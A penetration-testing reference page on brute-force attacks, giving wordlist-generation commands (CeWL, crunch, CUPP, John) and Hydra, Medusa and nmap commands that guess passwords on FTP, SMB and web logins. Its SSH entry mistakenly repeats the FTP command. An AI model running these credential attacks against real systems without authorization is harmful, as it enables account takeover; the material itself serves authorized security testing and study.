Brute Forcing #
At a Glance #
A brute-forcing attack consists of systematically enumerating all possible candidates for the solution and checking whether each candidate satisfies the problem’s statement.
In cryptography, a brute-force attack involves systematically checking all possible keys until the correct key is found. 1
Note: The success and efficiency of a brute-force attack rely mostly on the wordlist. Use a highly-reputed one.
Default Credentials #
Note: SecLists and WordList Compendium also include default passwords lists.
Wordlists #
- SecLists - The Pentester’s Companion
- Probable Wordlists
- WordList Compendium
- Jhaddix Content Discovery All
- Google Fuzzing Forum
- CrackStation’s Password Cracking Dictionary
Wordlist Generation #
CeWL 2 #
cewl example.com -m 3 -w wordlist.txt
Parameters
-m <length>: Minimum word length.-w <file>: Write the output to<file>.
Crunch 3 #
Simple wordlist.
crunch 6 12 abcdefghijk1234567890\@\! -o wordlist.txt
String permutation.
crunch 1 1 -p target pass 2019 -o wordlist.txt
Patterns.
crunch 9 9 0123456789 -t @target@@ -o wordlist.txt
Parameters
<min-len>: The minimum string length.<max-len>: The maximum string length.<charset>: Characters set.-o <file>: Specifies the file to write the output to.-p <charset or strings>: Permutation.-t <pattern>: Specifies a pattern, eg:@@pass@@@@.@will insert lower case characters,will insert upper case characters%will insert numbers^will insert symbols
Password Profiling #
CUPP 4 #
cupp -i
Parameters
-i: Interactive uestions for user password profiling.
Word Mangling #
john 5 #
john --wordlist=wordlist.txt --rules --stdout
Parameters
--wordlist <file>: Wordlist mode, read words from<file>orstdin.--rules[:CustomRule]: Enable word mangling rules. Use default or add[:CustomRule].--stdout: Output candidate passwords.
Note:
Custom rules can be appended
to John’s configuration file john.conf.
Services #
FTP #
See Combo (Colon Separated) Lists.
Hydra 6 #
hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp
Parameters
-v: verbose mode.-l <user>: login withusername.-P <passwords file>: login with passwords from file.-f: exit after the first found user/password pair.
SMB #
Hydra 6 #
hydra -v -t1 -l Administrator -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 smb
Parameters
-v: verbose mode.-t <tasks>: run<tasks>number of connects in parallel. Default: 16.-l <user>: login withusername.-P <passwords file>: login with passwords from file.-f: exit after the first found user/password pair.
smb-brute NSE Script. #
sudo nmap --script smb-brute -p U:137,T:139 10.0.0.3
SSH #
Hydra 6 #
hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp
Web Applications #
HTTP Basic Auth #
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/
HTTP Digest #
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/
HTTP POST Form #
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"
Parameters
-l <user>: login withusername.-L <users-file>: login with users from file.-P <passwords file>: login with passwords from file.http-head | http-get | http-post-form: service to attack.
HTTP Authenticated POST Form #
Append the Cookie header
with the session id
to the options string,
e.g.,
:H=Cookie\: security=low; PHPSESSID=if0kg4ss785kmov8bqlbusva3v.
6
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"
Miscellaneous #
Combo (Colon Separated) Lists #
Hydra 6 #
Use a colon separated login:pass format,
instead of -L/-P options.
hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f 10.0.0.3 ftp
Parameters
-v: verbose mode.-C <user:pass file>: colon-separated “login:pass” format.-f: exit after the first found user/password pair.
Medusa 7 #
Medusa’s combo files (colon-separated)
should be in the format host:username:password.
If any of the three values are missing,
the respective information
should be provided either
as a global value
or as a list in a file.
sed s/^/:/ /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > /tmp/cplist.txt
medusa -C /tmp/cplist.txt -h 10.0.0.3 -M ftp
Parameters
-u <user>: login withusername.-P <passwords file>: login with password from file.-h: target hostname or IP address.-M: module to execute.
Further Reading #
Contributors to Wikimedia projects. “Brute-Force Search - Wikipedia.” Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 13 Oct. 2002, https://en.wikipedia.org/wiki/Brute-force_search. ↩︎
digininja. “GitHub - Digininja/CeWL: CeWL Is a Custom Word List Generator.” GitHub, https://github.com/digininja/CeWL/. ↩︎
“Crunch - Wordlist Generator Download.” SourceForge, https://sourceforge.net/projects/crunch-wordlist/. ↩︎
Mebus. “GitHub - Mebus/Cupp: Common User Passwords Profiler (CUPP).” GitHub, https://github.com/Mebus/cupp. ↩︎
magnumripper. “JohnTheRipper.” GitHub, https://github.com/magnumripper/JohnTheRipper. ↩︎
Heuse, Marc. “GitHub - Vanhauser-Thc/Thc-Hydra: Hydra.” GitHub, https://github.com/vanhauser-thc/thc-hydra. Accessed 12 May 2020. ↩︎
“Foofus Networking Services - Medusa.” Foofus.Net | Foofus.Net Advanced Security Services Forum, http://foofus.net/goons/jmk/medusa/medusa.html. ↩︎